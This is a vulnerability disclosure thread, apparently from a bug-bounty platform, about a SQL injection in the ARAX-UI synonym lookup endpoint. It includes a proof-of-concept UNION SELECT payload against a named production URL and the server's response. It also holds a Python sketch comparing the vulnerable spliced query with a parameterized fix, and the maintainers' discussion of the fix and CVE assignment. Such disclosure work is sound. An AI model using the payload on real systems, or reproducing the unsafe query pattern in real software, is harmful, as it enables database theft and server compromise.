SQL injection vulnerability in ARAX-UI Synonym Lookup functionality in rtxteam/rtx
Reported on Apr 16th 2022
Description
The /rtxcomplete/nodeslike endpoint in the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. A malicious SQL payload in the word query parameter of this endpoint would allow an attacker to dump the database, modify data, or delete data. In addition, it is possible to completely take over the server hosting the application by achieving remote code execution via this vulnerability.
Proof of Concept
Perform a GET request to:
https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018
The server will return JSON in the HTTP response, with the SQLite version "3.11.0" appearing as the name of the first item in the array:
jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);
Impact
This vulnerability is critical as it can lead to remote code execution and thus complete server takeover.
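As an added example, not code from the RTX project (the real query and schema behind /rtxcomplete/nodeslike are not shown in the report and are assumed here), a Python sketch of the bug class beside its fix: the word value spliced into the statement text, versus a parameterized SQLite query that also escapes LIKE wildcards and bounds the limit parameter.

```python
import sqlite3

# Constructed sample rows standing in for the ARAX synonym table. The column
# names mirror the JSON fields in the report; the real RTX schema is assumed.
SAMPLE_NAMES = ["Testa-C", "testacea group", "Testacella", "Tested for HIV",
                "tester_1", "zebrafish"]


def build_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE synonyms (curie TEXT, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO synonyms VALUES ('??', ?, '??')",
                     [(n,) for n in SAMPLE_NAMES])
    return conn


def nodes_like_unsafe(conn, word, limit=15):
    # Anti-pattern (assumed shape of the bug): the request parameter is spliced
    # into the statement text, so a quote in `word` closes the string literal
    # and whatever follows is parsed as SQL. Even a legitimate name containing
    # an apostrophe breaks this query.
    sql = f"SELECT name FROM synonyms WHERE name LIKE '{word}%' LIMIT {int(limit)}"
    return [row[0] for row in conn.execute(sql)]


def escape_like(value, esc="\\"):
    # Escape the escape character itself first, then the LIKE wildcards, so
    # user input cannot widen the match with % or _.
    return (value.replace(esc, esc + esc)
                 .replace("%", esc + "%")
                 .replace("_", esc + "_"))


def nodes_like_safe(conn, word, limit=15):
    # Hardened form: the value travels as a bound parameter, never as SQL text;
    # the pattern is built in Python and the limit is validated and clamped.
    limit = max(1, min(int(limit), 100))
    pattern = escape_like(word) + "%"
    sql = ("SELECT name FROM synonyms WHERE name LIKE ? ESCAPE '\\' "
           "ORDER BY name COLLATE NOCASE LIMIT ?")
    return [row[0] for row in conn.execute(sql, (pattern, limit))]


if __name__ == "__main__":
    db = build_db()
    print(nodes_like_safe(db, "test"))
    print(nodes_like_safe(db, "%"))  # wildcard neutralised: []
```

With the hardened lookup, the report's payload is just a prefix that matches nothing, and a bare "%" no longer dumps the whole table.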
Thank you for reporting this issue. We have created a SECURITY.md file per your suggestion sent via email. We are working on a fix for this issue. Thank you for keeping the issue private until we have had a chance to fix it.
Thank you, we have fixed the issue with commit https://github.com/RTXteam/RTX/commit/fa2797e656e3dba18f990a2db1f0f029d41f1921
Thank you for reporting this issue to our team.
Thanks for the update @maintainer! @admin can we get a CVE for this?
@maintainer - are you able to mark as valid and fixed using the resolve button below?
Hi Jordan, what is a CVE? Please pardon my ignorance.
Hi @maintainer. No problem, happy to help. A CVE is simply an ID for this vulnerability. The mission of the CVE Program is to identify, define, and catalog publicly disclosed cybersecurity vulnerabilities. There is one CVE Record for each vulnerability in the catalog. The vulnerabilities are discovered then assigned and published by organizations from around the world that have partnered with the CVE Program, such as this platform (Huntr). Please see here for more info: https://www.cve.org/About/Overview
Just for further clarity, we take care of the entire CVE process for you, so there is nothing for you to do, except give us the go-ahead to publish one 👍
Thank you, Jordan. It turns out we have deployed the fix to one of our two production servers. Deployment to another production server involves coordinating with a federal agency (NIH) and may take a few days. Thank you for your patience.
Hi Jordan and Jamie, OK, I have confirmed that the patch was also deployed to the NIH's servers, and thus, we are ready to resolve this issue. Thank you for your patience, and a big thank you for reporting this security vulnerability through the huntr.dev program.
Great work to all involved! 👍
A CVE has been assigned and should be published shortly. More generally, this makes the rtxteam look like they take security seriously and are doing a great job at resolving security issues :)